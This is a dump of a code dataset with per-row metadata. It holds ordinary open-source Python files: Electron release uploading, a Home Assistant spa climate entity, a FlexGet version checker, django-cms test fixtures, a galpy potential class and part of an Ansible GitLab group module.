| text | repo_name | path | language | license | size | score |
|---|---|---|---|---|---|---|
| stringlengths 6–947k | stringlengths 5–100 | stringlengths 4–231 | stringclasses 1 value | stringclasses 15 values | int64 6–947k | float64 0–0.34 |
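Each row below pairs a source file (`text`) with its provenance and metadata (`repo_name`, `path`, `language`, `license`, `size`, `score`). A minimal sketch of iterating rows with this schema follows, assuming the dump has been exported as a JSON-lines file; the filename is only a placeholder:

import json

# "code_samples.jsonl" is a placeholder filename; each line is assumed to hold
# one record with the columns listed above.
with open("code_samples.jsonl") as fh:
    for line in fh:
        row = json.loads(line)
        print(row["repo_name"], row["path"], row["license"], row["size"], row["score"])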
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.login, name='login'),
]
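# Illustrative note (an assumption about the surrounding project): the
# project-level URLconf is expected to include this module, e.g.
#   url(r'^', include('login.urls')),
# so that the empty pattern above serves views.login.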
|
TrivialBox/HackatonUPS2016
|
helpfriends/login/urls.py
|
Python
|
mit
| 114 | 0.008772 |
#!/usr/bin/env python
import argparse
import errno
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
from io import StringIO
from lib.config import PLATFORM, get_target_arch, get_env_var, s3_config, \
get_zip_name
from lib.util import electron_gyp, execute, get_electron_version, \
parse_version, scoped_cwd, s3put
from lib.github import GitHub
ELECTRON_REPO = 'electron/electron'
ELECTRON_VERSION = get_electron_version()
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
DIST_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION)
SYMBOLS_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'symbols')
DSYM_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'dsym')
PDB_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'pdb')
def main():
args = parse_args()
if not args.publish_release:
if not dist_newer_than_head():
run_python_script('create-dist.py')
build_version = get_electron_build_version()
if not ELECTRON_VERSION.startswith(build_version):
error = 'Tag name ({0}) should match build version ({1})\n'.format(
ELECTRON_VERSION, build_version)
sys.stderr.write(error)
sys.stderr.flush()
return 1
github = GitHub(auth_token())
releases = github.repos(ELECTRON_REPO).releases.get()
tag_exists = False
for release in releases:
if not release['draft'] and release['tag_name'] == args.version:
tag_exists = True
break
release = create_or_get_release_draft(github, releases, args.version,
tag_exists)
if args.publish_release:
# Upload the Node SHASUMS*.txt.
run_python_script('upload-node-checksums.py', '-v', ELECTRON_VERSION)
# Upload the index.json.
run_python_script('upload-index-json.py')
# Create and upload the Electron SHASUMS*.txt
release_electron_checksums(github, release)
# Press the publish button.
publish_release(github, release['id'])
# Do not upload other files when passed "-p".
return
# Upload Electron with GitHub Releases API.
upload_electron(github, release, os.path.join(DIST_DIR, DIST_NAME))
upload_electron(github, release, os.path.join(DIST_DIR, SYMBOLS_NAME))
if PLATFORM == 'darwin':
upload_electron(github, release, os.path.join(DIST_DIR,
'electron-api.json'))
upload_electron(github, release, os.path.join(DIST_DIR, 'electron.d.ts'))
upload_electron(github, release, os.path.join(DIST_DIR, DSYM_NAME))
elif PLATFORM == 'win32':
upload_electron(github, release, os.path.join(DIST_DIR, PDB_NAME))
# Upload free version of ffmpeg.
ffmpeg = get_zip_name('ffmpeg', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, ffmpeg))
# Upload chromedriver and mksnapshot for minor version update.
if parse_version(args.version)[2] == '0':
chromedriver = get_zip_name('chromedriver', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, chromedriver))
mksnapshot = get_zip_name('mksnapshot', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, mksnapshot))
if PLATFORM == 'win32' and not tag_exists:
# Upload PDBs to Windows symbol server.
run_python_script('upload-windows-pdb.py')
# Upload node headers.
run_python_script('create-node-headers.py', '-v', args.version)
run_python_script('upload-node-headers.py', '-v', args.version)
def parse_args():
parser = argparse.ArgumentParser(description='upload distribution file')
parser.add_argument('-v', '--version', help='Specify the version',
default=ELECTRON_VERSION)
parser.add_argument('-p', '--publish-release',
help='Publish the release',
action='store_true')
return parser.parse_args()
def run_python_script(script, *args):
script_path = os.path.join(SOURCE_ROOT, 'script', script)
return execute([sys.executable, script_path] + list(args))
def get_electron_build_version():
if get_target_arch() == 'arm' or os.environ.has_key('CI'):
# In CI we just build as told.
return ELECTRON_VERSION
if PLATFORM == 'darwin':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.app'.format(PRODUCT_NAME), 'Contents',
'MacOS', PRODUCT_NAME)
elif PLATFORM == 'win32':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.exe'.format(PROJECT_NAME))
else:
electron = os.path.join(SOURCE_ROOT, 'out', 'R', PROJECT_NAME)
return subprocess.check_output([electron, '--version']).strip()
def dist_newer_than_head():
with scoped_cwd(SOURCE_ROOT):
try:
head_time = subprocess.check_output(['git', 'log', '--pretty=format:%at',
'-n', '1']).strip()
dist_time = os.path.getmtime(os.path.join(DIST_DIR, DIST_NAME))
except OSError as e:
if e.errno != errno.ENOENT:
raise
return False
return dist_time > int(head_time)
def get_text_with_editor(name):
editor = os.environ.get('EDITOR', 'nano')
initial_message = '\n# Please enter the body of your release note for %s.' \
% name
t = tempfile.NamedTemporaryFile(suffix='.tmp', delete=False)
t.write(initial_message)
t.close()
subprocess.call([editor, t.name])
text = ''
for line in open(t.name, 'r'):
if len(line) == 0 or line[0] != '#':
text += line
os.unlink(t.name)
return text
def create_or_get_release_draft(github, releases, tag, tag_exists):
# Search for existing draft.
for release in releases:
if release['draft']:
return release
if tag_exists:
tag = 'do-not-publish-me'
return create_release_draft(github, tag)
def create_release_draft(github, tag):
name = '{0} {1}'.format(PROJECT_NAME, tag)
if os.environ.has_key('CI'):
body = '(placeholder)'
else:
body = get_text_with_editor(name)
if body == '':
sys.stderr.write('Quit due to empty release note.\n')
sys.exit(0)
data = dict(tag_name=tag, name=name, body=body, draft=True)
r = github.repos(ELECTRON_REPO).releases.post(data=data)
return r
def release_electron_checksums(github, release):
checksums = run_python_script('merge-electron-checksums.py',
'-v', ELECTRON_VERSION)
upload_io_to_github(github, release, 'SHASUMS256.txt',
StringIO(checksums.decode('utf-8')), 'text/plain')
def upload_electron(github, release, file_path):
# Delete the original file before uploading in CI.
filename = os.path.basename(file_path)
if os.environ.has_key('CI'):
try:
for asset in release['assets']:
if asset['name'] == filename:
github.repos(ELECTRON_REPO).releases.assets(asset['id']).delete()
except Exception:
pass
# Upload the file.
with open(file_path, 'rb') as f:
upload_io_to_github(github, release, filename, f, 'application/zip')
# Upload the checksum file.
upload_sha256_checksum(release['tag_name'], file_path)
# Upload ARM assets without the v7l suffix for backwards compatibility
# TODO Remove for 2.0
if 'armv7l' in filename:
arm_filename = filename.replace('armv7l', 'arm')
arm_file_path = os.path.join(os.path.dirname(file_path), arm_filename)
shutil.copy2(file_path, arm_file_path)
upload_electron(github, release, arm_file_path)
def upload_io_to_github(github, release, name, io, content_type):
params = {'name': name}
headers = {'Content-Type': content_type}
github.repos(ELECTRON_REPO).releases(release['id']).assets.post(
params=params, headers=headers, data=io, verify=False)
def upload_sha256_checksum(version, file_path):
bucket, access_key, secret_key = s3_config()
checksum_path = '{}.sha256sum'.format(file_path)
sha256 = hashlib.sha256()
with open(file_path, 'rb') as f:
sha256.update(f.read())
filename = os.path.basename(file_path)
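# Write the checksum in the conventional sha256sum layout
# ("<hexdigest> *<filename>", where '*' marks binary mode), so the file can be
# checked with `sha256sum -c`.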
with open(checksum_path, 'w') as checksum:
checksum.write('{} *{}'.format(sha256.hexdigest(), filename))
s3put(bucket, access_key, secret_key, os.path.dirname(checksum_path),
'atom-shell/tmp/{0}'.format(version), [checksum_path])
def publish_release(github, release_id):
data = dict(draft=False)
github.repos(ELECTRON_REPO).releases(release_id).patch(data=data)
def auth_token():
token = get_env_var('GITHUB_TOKEN')
message = ('Error: Please set the $ELECTRON_GITHUB_TOKEN '
'environment variable, which is your personal token')
assert token, message
return token
if __name__ == '__main__':
import sys
sys.exit(main())
|
rreimann/electron
|
script/upload.py
|
Python
|
mit
| 8,894 | 0.011806 |
"""Support for Balboa Spa Wifi adaptor."""
from __future__ import annotations
import asyncio
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_WHOLE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from .const import CLIMATE, CLIMATE_SUPPORTED_FANSTATES, CLIMATE_SUPPORTED_MODES, DOMAIN
from .entity import BalboaEntity
SET_TEMPERATURE_WAIT = 1
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the spa climate device."""
async_add_entities(
[
BalboaSpaClimate(
entry,
hass.data[DOMAIN][entry.entry_id],
CLIMATE,
)
],
)
class BalboaSpaClimate(BalboaEntity, ClimateEntity):
"""Representation of a Balboa Spa Climate device."""
_attr_icon = "mdi:hot-tub"
_attr_fan_modes = CLIMATE_SUPPORTED_FANSTATES
_attr_hvac_modes = CLIMATE_SUPPORTED_MODES
def __init__(self, entry, client, devtype, num=None):
"""Initialize the climate entity."""
super().__init__(entry, client, devtype, num)
self._balboa_to_ha_blower_map = {
self._client.BLOWER_OFF: FAN_OFF,
self._client.BLOWER_LOW: FAN_LOW,
self._client.BLOWER_MEDIUM: FAN_MEDIUM,
self._client.BLOWER_HIGH: FAN_HIGH,
}
self._ha_to_balboa_blower_map = {
value: key for key, value in self._balboa_to_ha_blower_map.items()
}
self._balboa_to_ha_heatmode_map = {
self._client.HEATMODE_READY: HVAC_MODE_HEAT,
self._client.HEATMODE_RNR: HVAC_MODE_AUTO,
self._client.HEATMODE_REST: HVAC_MODE_OFF,
}
self._ha_heatmode_to_balboa_map = {
value: key for key, value in self._balboa_to_ha_heatmode_map.items()
}
scale = self._client.get_tempscale()
self._attr_preset_modes = self._client.get_heatmode_stringlist()
self._attr_supported_features = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
if self._client.have_blower():
self._attr_supported_features |= SUPPORT_FAN_MODE
self._attr_min_temp = self._client.tmin[self._client.TEMPRANGE_LOW][scale]
self._attr_max_temp = self._client.tmax[self._client.TEMPRANGE_HIGH][scale]
self._attr_temperature_unit = TEMP_FAHRENHEIT
self._attr_precision = PRECISION_WHOLE
if self._client.get_tempscale() == self._client.TSCALE_C:
self._attr_temperature_unit = TEMP_CELSIUS
self._attr_precision = PRECISION_HALVES
@property
def hvac_mode(self) -> str:
"""Return the current HVAC mode."""
mode = self._client.get_heatmode()
return self._balboa_to_ha_heatmode_map[mode]
@property
def hvac_action(self) -> str:
"""Return the current operation mode."""
state = self._client.get_heatstate()
if state >= self._client.ON:
return CURRENT_HVAC_HEAT
return CURRENT_HVAC_IDLE
@property
def fan_mode(self) -> str:
"""Return the current fan mode."""
fanmode = self._client.get_blower()
return self._balboa_to_ha_blower_map.get(fanmode, FAN_OFF)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._client.get_curtemp()
@property
def target_temperature(self):
"""Return the target temperature we try to reach."""
return self._client.get_settemp()
@property
def preset_mode(self):
"""Return current preset mode."""
return self._client.get_heatmode(True)
async def async_set_temperature(self, **kwargs):
"""Set a new target temperature."""
scale = self._client.get_tempscale()
newtemp = kwargs[ATTR_TEMPERATURE]
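# The spa exposes two temperature ranges (low/high). If the requested
# temperature falls outside the range that is currently reachable, switch
# ranges first and give the unit a moment to apply the change.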
if newtemp > self._client.tmax[self._client.TEMPRANGE_LOW][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_HIGH)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
if newtemp < self._client.tmin[self._client.TEMPRANGE_HIGH][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_LOW)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
await self._client.send_temp_change(newtemp)
async def async_set_preset_mode(self, preset_mode) -> None:
"""Set new preset mode."""
modelist = self._client.get_heatmode_stringlist()
self._async_validate_mode_or_raise(preset_mode)
if preset_mode not in modelist:
raise ValueError(f"{preset_mode} is not a valid preset mode")
await self._client.change_heatmode(modelist.index(preset_mode))
async def async_set_fan_mode(self, fan_mode):
"""Set new fan mode."""
await self._client.change_blower(self._ha_to_balboa_blower_map[fan_mode])
def _async_validate_mode_or_raise(self, mode):
"""Check that the mode can be set."""
if mode == self._client.HEATMODE_RNR:
raise ValueError(f"{mode} can only be reported but not set")
async def async_set_hvac_mode(self, hvac_mode):
"""Set new target hvac mode.
OFF = Rest
AUTO = Ready in Rest (can't be set, only reported)
HEAT = Ready
"""
mode = self._ha_heatmode_to_balboa_map[hvac_mode]
self._async_validate_mode_or_raise(mode)
await self._client.change_heatmode(self._ha_heatmode_to_balboa_map[hvac_mode])
|
home-assistant/home-assistant
|
homeassistant/components/balboa/climate.py
|
Python
|
apache-2.0
| 5,803 | 0.001206 |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from past.builtins import basestring
import logging
from datetime import datetime
from sqlalchemy import Column, DateTime
from flexget import db_schema, plugin
from flexget.event import event
from flexget.manager import Session
from flexget.utils.tools import get_latest_flexget_version_number, get_current_flexget_version
log = logging.getLogger('version_checker')
Base = db_schema.versioned_base('version_checker', 0)
class LastVersionCheck(Base):
__tablename__ = 'last_version_check'
last_check_time = Column(DateTime, primary_key=True)
def __init__(self):
self.update()
def update(self):
self.last_check_time = datetime.now()
schema = {
'oneOf': [
{'type': 'boolean'},
{'type': 'string', 'enum': ['always', 'by_interval']},
{
'type': 'object',
'properties': {
'lookup': {'type': 'string', 'enum': ['always', 'by_interval']},
'check_for_dev_version': {'type': 'boolean'},
'interval': {'type': 'integer'},
},
'additionalProperties': False,
},
]
}
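# Example configs accepted by the schema above (illustrative):
#   version_checker: yes
#   version_checker: always
#   version_checker:
#     lookup: by_interval
#     check_for_dev_version: no
#     interval: 7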
class VersionChecker(object):
"""
A plugin that checks whether the user is running the latest FlexGet version and logs a warning if not.
Checks on an interval to avoid hammering the server; the default interval is 1 day.
Can accept a boolean or one of ['always', 'by_interval'] in config.
Can also accept an object. If the check_for_dev_version option is True, the version will be checked even if the
current release is a dev release; otherwise the check is skipped.
"""
def prepare_config(self, config):
if isinstance(config, bool) and config is True:
config = {'lookup': 'by_interval'}
elif isinstance(config, basestring):
config = {'lookup': config}
config.setdefault('lookup', 'by_interval')
config.setdefault('interval', 1)
config.setdefault('check_for_dev_version', False)
return config
def on_task_start(self, task, config):
if not config:
return
config = self.prepare_config(config)
current_version = get_current_flexget_version()
if config.get('check_for_dev_version') is False and current_version.endswith('dev'):
log.debug('dev version detected, skipping check')
return
always_check = bool(config.get('lookup') == 'always')
interval = config.get('interval')
session = Session()
last_check = session.query(LastVersionCheck).first()
if not always_check:
if last_check:
time_dif = datetime.now() - last_check.last_check_time
should_poll = time_dif.days > interval
else:
should_poll = True
if not should_poll:
log.debug('version check interval not met, skipping check')
return
latest_version = get_latest_flexget_version_number()
if not latest_version:
log.warning('Could not get latest version of flexget')
return
elif latest_version != current_version:
log.warning(
'You are not running latest Flexget Version. Current is %s and latest is %s',
current_version,
latest_version,
)
if last_check:
log.debug('updating last check time')
last_check.update()
else:
last_check = LastVersionCheck()
log.debug('creating instance of last version check in DB')
session.add(last_check)
@event('plugin.register')
def register_plugin():
plugin.register(VersionChecker, 'version_checker', api_ver=2)
|
tobinjt/Flexget
|
flexget/plugins/operate/version_checker.py
|
Python
|
mit
| 3,855 | 0.001556 |
from test_oop import *
from beliefs.referent import *
import sys
TaxonomyCell.initialize(sys.modules[__name__])
m = MusicalThing()
print m
t = TaxonomyCell()
t.to_dot()
|
EventTeam/beliefs
|
test_oop/__init__.py
|
Python
|
gpl-2.0
| 171 | 0.005848 |
# Lesson 3
# If arguments n3 or later aren't provided by the caller, they'll use a default value instead
def add(n1, n2, n3=0, n4=0, n5=0, n6=0): # (We'll learn a better way to do something like this later)
return n1 + n2 + n3 + n4 + n5 + n6
print(add(1, 2, 3, 4))
# We can explicitly fulfil arguments out of order by using "named parameters"
print(add(n2=1, n1=4, n6=3))
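# One more example: defaults and named parameters can be mixed freely
print(add(1, 2, n5=10))  # n3, n4 and n6 keep their default of 0, so this prints 13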
|
JonTheBurger/python_class
|
chapter 3/lessons/default_arguments.py
|
Python
|
mit
| 383 | 0.007833 |
###############################################################################
# PowerSphericalPotentialwCutoff.py: spherical power-law potential w/ cutoff
#
#   rho(r) = amp / r^alpha * exp(-(r/rc)^2)
###############################################################################
import numpy as nu
from scipy import special, integrate
from galpy.potential_src.Potential import Potential, kms_to_kpcGyrDecorator
class PowerSphericalPotentialwCutoff(Potential):
"""Class that implements spherical potentials that are derived from
power-law density models
.. math::
\\rho(r) = \\frac{\\mathrm{amp}}{r^\\alpha}\\,\\exp\\left(-(r/rc)^2\\right)
"""
def __init__(self,amp=1.,alpha=1.,rc=1.,normalize=False):
"""
NAME:
__init__
PURPOSE:
initialize a power-law-density potential
INPUT:
amp= amplitude to be applied to the potential (default: 1)
alpha= inner power
rc= cut-off radius
normalize= if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
OUTPUT:
(none)
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
Potential.__init__(self,amp=amp)
self.alpha= alpha
self.rc= rc
self._scale= self.rc
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
self.hasC= True
self.hasC_dxdv= True
self._nemo_accname= 'PowSphwCut'
def _evaluate(self,R,z,phi=0.,t=0.):
"""
NAME:
_evaluate
PURPOSE:
evaluate the potential at R,z
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
Phi(R,z)
HISTORY:
2013-06-28 - Started - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)/r*(r/self.rc*special.gamma(1.-self.alpha/2.)*special.gammainc(1.-self.alpha/2.,(r/self.rc)**2.)-special.gamma(1.5-self.alpha/2.)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.))
def _Rforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rforce
PURPOSE:
evaluate the radial force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the radial force
HISTORY:
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*R/r**3.
def _zforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_zforce
PURPOSE:
evaluate the vertical force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the vertical force
HISTORY:
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*z/r**3.
def _R2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rderiv
PURPOSE:
evaluate the second radial derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the second radial derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*R**2.\
+self._mass(r)/r**5.*(z**2.-2.*R**2.)
def _z2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_z2deriv
PURPOSE:
evaluate the second vertical derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
the second vertical derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*z**2.\
+self._mass(r)/r**5.*(R**2.-2.*z**2.)
def _Rzderiv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rzderiv
PURPOSE:
evaluate the mixed R,z derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
d2phi/dR/dz
HISTORY:
2013-08-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return R*z*(4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)
-3.*self._mass(r)/r**5.)
def _dens(self,R,z,phi=0.,t=0.):
"""
NAME:
_dens
PURPOSE:
evaluate the density force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the density
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 1./r**self.alpha*nu.exp(-(r/self.rc)**2.)
def _mass(self,R,z=0.,t=0.):
"""
NAME:
_mass
PURPOSE:
evaluate the mass within R for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
t - time
OUTPUT:
the mass enclosed
HISTORY:
2013-XX-XX - Written - Bovy (IAS)
"""
if z is None: r= R
else: r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.)*special.gamma(1.5-self.alpha/2.)
@kms_to_kpcGyrDecorator
def _nemo_accpars(self,vo,ro):
"""
NAME:
_nemo_accpars
PURPOSE:
return the accpars potential parameters for use of this potential with NEMO
INPUT:
vo - velocity unit in km/s
ro - length unit in kpc
OUTPUT:
accpars string
HISTORY:
2014-12-18 - Written - Bovy (IAS)
"""
ampl= self._amp*vo**2.*ro**(self.alpha-2.)
return "0,%s,%s,%s" % (ampl,self.alpha,self.rc*ro)
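# Illustrative usage sketch (the parameter values below are only an example):
#   bulge = PowerSphericalPotentialwCutoff(alpha=1.8, rc=1.9/8., normalize=0.05)
#   print(bulge(1., 0.))   # Potential instances are callable: Phi(R, z)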
|
followthesheep/galpy
|
galpy/potential_src/PowerSphericalPotentialwCutoff.py
|
Python
|
bsd-3-clause
| 6,813 | 0.011449 |
import logging
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.models import ContentType
from cms.models import Page, PagePermission
from django_cms_tools.fixtures.pages import CmsPageCreator
# https://github.com/jedie/django-tools
from django_tools.permissions import get_filtered_permissions, pformat_permission
from django_tools.unittest_utils.user import get_or_create_user_and_group
from publisher import constants
from publisher.models import PublisherStateModel
from publisher_test_project.constants import EDITOR_GROUP, EDITOR_USER, REPORTER_GROUP, REPORTER_USER
from publisher_test_project.publisher_list_app.fixtures import list_item_fixtures
from publisher_test_project.publisher_list_app.models import PublisherItem
from publisher_test_project.publisher_test_app.models import (PublisherParlerAutoSlugifyTestModel,
PublisherParlerTestModel, PublisherTestModel)
log = logging.getLogger(__name__)
def get_permission(model, codename):
content_type = ContentType.objects.get_for_model(model)
permission = Permission.objects.get(content_type=content_type, codename=codename)
return permission
class TestPageCreator(CmsPageCreator):
placeholder_slots = ("content",)
dummy_text_count = 1
def __init__(self, no, *args, **kwargs):
self.no = no
super(TestPageCreator, self).__init__(*args, **kwargs)
def get_title(self, language_code, lang_name):
return "Test page %i in %s" % (self.no, lang_name)
def get_slug(self, language_code, lang_name):
slug = super(TestPageCreator, self).get_slug(language_code, lang_name)
log.debug("slug: %r (%r %s)", slug, language_code, lang_name)
return slug
def get_add_plugin_kwargs(self, page, no, placeholder, language_code, lang_name):
"""
Return the kwargs (plugin type and text content) used to create the plugin.
Called from self.add_plugins()
"""
return {
"plugin_type": "PlainTextPlugin", # publisher_test_app.cms_plugins.PlainTextPlugin
"text": "Dummy plain text plugin no.%i" % self.no
}
def create_test_user(delete_first=False):
User=get_user_model()
if delete_first:
qs = User.objects.exclude(is_superuser=True, is_active=True)
print("Delete %i users..." % qs.count())
qs.delete()
qs = Group.objects.all()
print("Delete %i user groups..." % qs.count())
qs.delete()
# all_permissions = [
# "%s.%s" % (entry.content_type, entry.codename)
# for entry in Permission.objects.all().order_by("content_type", "codename")
# ]
# pprint.pprint(all_permissions)
superuser_qs = User.objects.all().filter(is_superuser=True, is_active=True)
try:
superuser = superuser_qs[0]
except IndexError:
print("\nERROR: No active superuser found!")
print("Please create one and run again!\n")
sys.exit(-1)
print("Use password from Superuser:", superuser)
encrypted_password = superuser.password
# 'reporter' user can create (un-)publish requests:
reporter_user = get_or_create_user_and_group(
username=REPORTER_USER,
groupname=REPORTER_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(
    "can_publish",  # <app_name>.can_publish_<model_name>
    "delete",  # <app_name>.delete_<model_name>
),
exclude_permissions=(
# Django CMS permissions:
(Page, "publish_page"), # cms.publish_page
(Page, "delete_page"), # cms.delete_page
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
(PublisherParlerAutoSlugifyTestModel, "can_publish_publisherparlerautoslugifytestmodel"),
(PublisherParlerAutoSlugifyTestModel, "delete_publisherparlerautoslugifytestmodel"),
(PublisherItem, "can_publish_publisheritem"),
(PublisherItem, "delete_publisheritem"),
(PublisherParlerTestModel, "can_publish_publisherparlertestmodel"),
(PublisherParlerTestModel, "delete_publisherparlertestmodel"),
(PublisherTestModel, "can_publish_publishertestmodel"),
(PublisherTestModel, "delete_publishertestmodel"),
),
),
encrypted_password=encrypted_password
)
# 'editor' can direct (un-)publish & accept/reject a (un-)publish request
editor_user = get_or_create_user_and_group(
username=EDITOR_USER,
groupname=EDITOR_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(),
exclude_permissions=(
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
),
),
encrypted_password=encrypted_password
)
return reporter_user, editor_user
def create_test_page(delete_first=False):
for no in range(1,5):
page, created = TestPageCreator(no=no, delete_first=delete_first).create()
if created:
print("Test page created: '%s'" % page)
else:
print("Test page already exists: '%s'" % page)
def create_test_model_entries(delete_first=False):
if delete_first:
qs = PublisherTestModel.objects.all()
print("Delete %i test model entries..." % qs.count())
qs.delete()
for no in range(1,5):
instance, created = PublisherTestModel.objects.get_or_create(
no = no,
title="Test entry %i" % no,
publisher_is_draft=True
)
if created:
print("Test model entry: '%s'" % instance)
else:
print("Test model entry already exists: '%s'" % instance)
instance.publish()
def create_test_data(delete_first=False):
if delete_first:
qs = Page.objects.all()
log.debug("Delete %i CMS pages...", qs.count())
qs.delete()
reporter_user, editor_user = create_test_user(delete_first=delete_first)
create_test_page(delete_first=delete_first)
create_test_model_entries(delete_first=delete_first)
list_item_fixtures()
return reporter_user, editor_user
|
wearehoods/django-model-publisher-ai
|
publisher_test_project/fixtures.py
|
Python
|
bsd-3-clause
| 6,789 | 0.003535 |
#!/usr/bin/python
# Copyright: (c) 2015, Werner Dijkerman (ikben@werner-dijkerman.nl)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gitlab_group
short_description: Creates/updates/deletes Gitlab Groups
description:
- When the group does not exist in Gitlab, it will be created.
- When the group does exist and state=absent, the group will be deleted.
- As of Ansible version 2.7, this module makes use of a different Python module and thus some arguments are deprecated.
version_added: "2.1"
author: "Werner Dijkerman (@dj-wasabi)"
requirements:
- python-gitlab python module
options:
server_url:
description:
- Url of Gitlab server, with protocol (http or https).
required: true
validate_certs:
description:
- Whether the SSL certificate should be verified when using https.
type: bool
default: 'yes'
aliases:
- verify_ssl
login_user:
description:
- Gitlab user name.
login_password:
description:
- Gitlab password for login_user
login_token:
description:
- Gitlab token for logging in.
name:
description:
- Name of the group you want to create.
required: true
path:
description:
- The path of the group you want to create, this will be server_url/group_path
- If not supplied, the group_name will be used.
description:
description:
- A description for the group.
version_added: "2.7"
state:
description:
- create or delete group.
- Possible values are present and absent.
default: "present"
choices: ["present", "absent"]
'''
EXAMPLES = '''
- name: "Delete Gitlab Group"
local_action:
gitlab_group:
server_url: http://gitlab.dj-wasabi.local
validate_certs: False
login_token: WnUzDsxjy8230-Dy_k
name: my_first_group
state: absent
- name: "Create Gitlab Group"
local_action:
gitlab_group:
server_url: https://gitlab.dj-wasabi.local"
validate_certs: True
login_user: dj-wasabi
login_password: "MySecretPassword"
name: my_first_group
path: my_first_group
state: present
'''
RETURN = '''# '''
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except Exception:
HAS_GITLAB_PACKAGE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
class GitLabGroup(object):
def __init__(self, module, git):
self._module = module
self._gitlab = git
self.groupObject = None
def createOrUpdateGroup(self, name, path, description):
changed = False
if self.groupObject is None:
group = self._gitlab.groups.create({'name': name, 'path': path})
changed = True
else:
group = self.groupObject
if description is not None:
if group.description != description:
group.description = description
changed = True
if changed:
if self._module.check_mode:
